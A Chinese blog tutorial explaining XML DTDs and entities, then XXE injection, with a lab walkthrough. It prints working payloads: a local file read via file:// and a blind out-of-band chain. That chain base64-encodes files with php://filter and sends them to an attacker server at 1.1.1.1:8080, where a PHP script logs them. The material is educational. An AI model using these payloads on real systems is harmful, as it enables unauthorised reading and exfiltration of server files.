XXE-实体注入

最新推荐文章于 2024-02-22 17:16:02 发布
最新推荐文章于 2024-02-22 17:16:02 发布
阅读量4.2k 收藏 2
点赞数 3
分类专栏: Novice
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36618918/article/details/106690712
版权

XXE介绍

XXE即外部实体,从安全角度理解为XML外部实体注入攻击
XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。

文档类型定义(DTD)可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。
DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用。

内部DTD声明:

<!DOCTYPE 根元素 [元素声明]>

实例:

<?xml version="1.0"?>
<!DOCTYPE note [
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to      (#PCDATA)>
<!ELEMENT from    (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body    (#PCDATA)>
]>
<note>
<to>George</to>
<from>John</from>
<heading>Reminder</heading>
<body>Don't forget the meeting!</body>
</note>

引用外部DTD声明:

<!DOCTYPE 根元素 SYSTEM "文件名">
或者
<!DOCTYPE 根元素 PUBLIC "public_ID" "文件名">

实例:

<?xml version="1.0"?>
<!DOCTYPE note SYSTEM "note.dtd">
<note>
<to>George</to>
<from>John</from>
<heading>Reminder</heading>
<body>Don't forget the meeting!</body>
</note>

这是包含 DTD 的 “note.dtd” 文件:

<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
DTD实体

实体是用于定义引用普通文本或特殊字符的快捷方式的变量。
实体引用是对实体的引用。
实体可在内部或外部进行声明。

一个外部实体声明

语法:

<!ENTITY 实体名称 SYSTEM "URI/URL">

DTD 例子:

<!ENTITY writer SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">
<!ENTITY copyright SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">

XML 例子:

<author>&writer;&copyright;</author>

一个内部实体声明

语法:

<!ENTITY 实体名称 "实体的值">

DTD 例子:

<!ENTITY writer "Bill Gates">
<!ENTITY copyright "Copyright W3School.com.cn">

XML 例子:

<author>&writer;&copyright;</author>

实体又分为一般实体和参数实体:

一般实体的声明语法:

<!ENTITY 实体名 “实体内容“>

引用实体的方式:&实体名;

** 参数实体只能在DTD中使用,参数实体的声明格式:**

<!ENTITY % 实体名 “实体内容“>

引用实体的方式:%实体名;

一个实体由三部分构成: 一个和号 (&), 一个实体名称, 以及一个分号 (😉。

简单XXE攻击payload:

<?php
$test='<!DOCTYPE scan [<!ENTITY test SYSTEM "file:///c:/1.txt">]><scan>&test;</scan>';
$obj=simplexml_load_string($test,'SimpleXMLElement',LIBXML_NOENT);
print_r($obj);
?>

test是一个变量,里面是XML,访问读取了C盘的1.txt然后使用simplexml_load_string将其转换为对象打印出来

simplexml_load_string()函数

功能

把 XML 字符串载入对象中

语法

simplexml_load_string(_data,classname,options,ns,is_prefix_ );

第一个参数是xml语句,SimpleXMLElement是调用了SimpleXMlement这个类,然后LIBXML_NOET是代替实体,然后去调用文件c盘下1.txt。

在实战中后端语言解析了XML是不会输出读取内容的,我们需要一个类似接受平台的接收器,将XML读取的数据发送到接收平台,然后接受平台储存然后我们在接受平台上分析。先使用PHP伪协议读取文件:

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=c:/1.txt">

然后去调用 用来XXE的服务器中的一个xml文档文件:

<!ENTITY % remote SYSTEM "http://192.168.1.100/1.xml">

而这个XML写的内容如下:

<!ENTITY % all
"<!ENTITY &#x25; send SYSTEM 'http://1.1.1.1:8080/2.php?id=%file;'>">
%all;      //调用实体

1.XML文档会调用2.php文件并向id通过GET方式传入%file 读取的内容
而2.php的内容如下:

<?php file_put_contents("3.txt",$_GET['id'],FILE_APPEND);?>

2.php被调用后会将id传进来的参数即%file的内容写入到3.php中,我们就可以通过访问3.php得到我们想读取的内容;

靶场演示

在这里插入图片描述
进入XXE靶场(外部实体注入),我们发现了simplexml_load_string()函数,这里很可能有XXE漏洞,我们看下附件代码:
在这里插入图片描述
发现这里通过$poststr接收数据并将数据直接放入到simplexml_load_string()转换为对象,那这里是可以进行XXE的;
我们先构造出XXE的poc代码:
在这里插入图片描述

第三行是通过php伪协议去读取被攻击服务器下的flag.php文件内容(base64编码,方便数据传输)
第四行是通过外部实体声明加载攻击者服务器的1.xml文件
第五行调用外部实体remote
第六行调用外部实体send

1.xml文件内容如下:

<!ENTITY % all	
"<!ENTITY &#x25; send SYSTEM 'http://1.1.1.1:8080/xxe/2.php?id=%file;'>"
\>
%all;

调用2.php并传入参数
2.php内容如下:

<?php file_put_contents("3.txt",$_GET['id'],FILE_APPEND);?>

将传参的内容,即读取到的文件写入放到3.txt中,成功读取文件
抓包,通过POST方式上传
在这里插入图片描述
访问自己用来接收的服务器,看看3.txt是否收到读取的文件
在这里插入图片描述
成功读取到文件,因为之前对其进行base64编码,所以进行base64解码即可得到原来的内容!

keepb1ue
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
5、XXE漏洞pdf资料
10-15
5、XXE漏洞
xxe-injection-payload-list::bullseye:XML外部实体XXE注入有效负载列表
02-06
xxe-injection-payload-list::bullseye:XML外部实体XXE注入有效负载列表
XXE实体注入(超详细!)
bdfcfff77fa的博客
02-22 968
程序分析:SYSTEM关键字令XML解析器读取了C:/phpStudy/scms/conn/conn.php里面的内容并进行base64编码赋值给了实体file,同时去访问了炮台上的1.xml,在1.xml会将实体file里面的值当成$_GET获得的id传参,去访问了2.php,在2.php里面将id传参的值记录下来,写进了3.txt文档里。访问http://59.63.200.79:8207/adminer.php ,输入账号,密码,库名进行登录,登录成功。将1.txt的东西,放入test这个变量。
xxe漏洞靶机编写poc和exp
rlenew的博客
11-25 1073
主机地址:172.16.131.85 靶机地址:192.168.6.211 (这里不再对xxe漏洞进行讲解,自行百度。主要分为两类有回显xxe和无回显xxe) 直接访问靶机地址 利用dirb扫描得到了xxe和admin.php页面,访问xxe 抓包进行测试 因为已经是xxe靶机了,所以直接开始编写poc代码。poc的主要代码段为 def poc(url): payload = '<?xml version="1.0" encoding="UTF-8"?>\n' payload
pocsuite3框架编写php_xxepoc
willow_liang的博客
10-16 287
pocsuite3框架编写php_xxepoc 环境地址:php_xxe py脚本 from collections import OrderedDict from urllib.parse import urljoin import re from pocsuite3.api import POCBase, Output, register_poc, logger, requests, OptDict, VUL_TYPE from pocsuite3.api import REVERSE_PAYLOAD
XXE blind 简单poc & 读文件
3569
03-27 3030
原理简介: https://blog.csdn.net/u011721501/article/details/43775691 首先你要确定是xml格式的数据,content-type是xml,PHP和JAVA利用有点不一样 PHP 利用方式 读取文件POC 利用: 自己vps放置 xxe.xml <!ENTITY % payload SYSTEM "php://fil...
安全测试 - 第二课之XXE 漏洞
撒忆雨
07-23 373
英文简称:XXE 英文全称:XML Extension Entity Injection 中文全称:XML 外部实体注入 XML是⼀种⾮常流⾏的标记语⾔。它⽤于配置⽂件,⽂档格式(如OOXML,ODF,PDF,RSS,…),图像格式(SVG, EXIF标题)和⽹络协议(WebDAV,CalDAV,XMLRPC,SOAP,XMPP,SAML, XACML,…) 常⻅的xml注⼊攻击如下所示: 攻击原理主要是: 在解析外部实体的过程中,XML解析器可以根据URL中指定的⽅案(协议)来查询各种⽹络协议和服务(D
XXE攻击指南
zz_strive_2012的专栏
07-30 371
现在许多不同的客户端技术,如web端,移动端,云端等使用XML向业务应用程序发送消息。为了使应用程序使用这些自定义的XML消息,应用程序必须去解析XML文档并检查格式是否正确。 本文将描述XML外部实体XXE注入攻击及其基础知识,以便更好地了解如何攻击以及如何处理。 既然我们将谈论XXE注入,那么首先我们应该了解外部实体的含义以及实现的内容。 外部实体是指XML处理器必须解析的数据。它对于在多个文档之间创建共享的公共引用很有用。对外部实体进行的任何更改将在包含对其的引用的文档中自动更新。即XML使
XXE - 实体注入
净邪的博客
06-26 1248
什么是xxeXXE = XML External Entity 即外部实体,从安全角度理解成XML External Entity attack XML外部实体注入攻击 典型的攻击如下: 定义实体必须写在DTD部分 拆分开来简单点来说就是: XML: 官方介绍: XML 指可扩展标记语言(EXtensible Markup Language) XML 是一种标记语言,很类似 HTML XML 的设计宗旨是传输数据,而非显示数据 XML 标签没有被预定义。您需要自行定义标签。.
XXE详解
qq_48904485的博客
03-22 5258
一、XML基础知识 1、XML简介: XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素 XML 和 HTML 为不同的目的而设计: XML 被设计用来传输和存储数据,其焦点是数据的内容。 HTML 被设计用来显示数据,其焦点是数据的外观。 HTML 旨在显示信息,而 XML 旨在传输信息。 2、XML 语法 1)XML 声明文件的可选部分,如果存在需要放在文
XXE 原理漏洞详解.md
04-03
XXE原理漏洞,易懂。
刚开始学XXE漏洞,可以看看这个博客.md
05-05
刚开始学XXE漏洞的时候,很懵,看见了这个博客,就转载一下,希望对刚接触这个东西的同学有帮助,刚学的时候浪费了很多时间,希望别人可以少浪费这个找资源的时间
WEB安全之XXE实体注入漏洞.pdf
12-12
WEB安全之XXE实体注入漏洞
XXE(XML 实体注入)漏洞攻防分析1
08-08
所以XXE和xss,sqli 等一样都是比较广泛的漏洞,所以从以往发现的漏洞可以看到很多厂商都存在这种漏洞,包括邮箱、门户、通用CMS等,如网易、腾讯邮箱XXE
WebSphere XML外部实体(XXE)注入漏洞(CVE-2020-4643)
10-25
WebSphere 9.0.0-9.0.5.5及8.5.0.0-8.5.5.18:更新安全补丁PH27509 WebSphere 8.0.0.0-8.0.0.15:升级到8.0.0.15版本,然后更新安全补丁PH27509 WebSphere 7.0.0.0-7.0.0.45:升级到7.0.0.45版本,然后更新安全补丁...
python学习导航.txt
05-06
python
node-v8.3.0-linux-s390x.tar.xz
最新发布
05-06
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
关于xxe外部实体安全
04-27
XXE攻击是指攻击者通过XML实体注入漏洞,向应用程序中注入恶意的XML实体数据,从而导致应用程序解析XML实体时,触发攻击者构造的恶意行为。其中,外部实体注入攻击是XXE攻击中最常见的一种方式。 为了防止XXE攻击中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值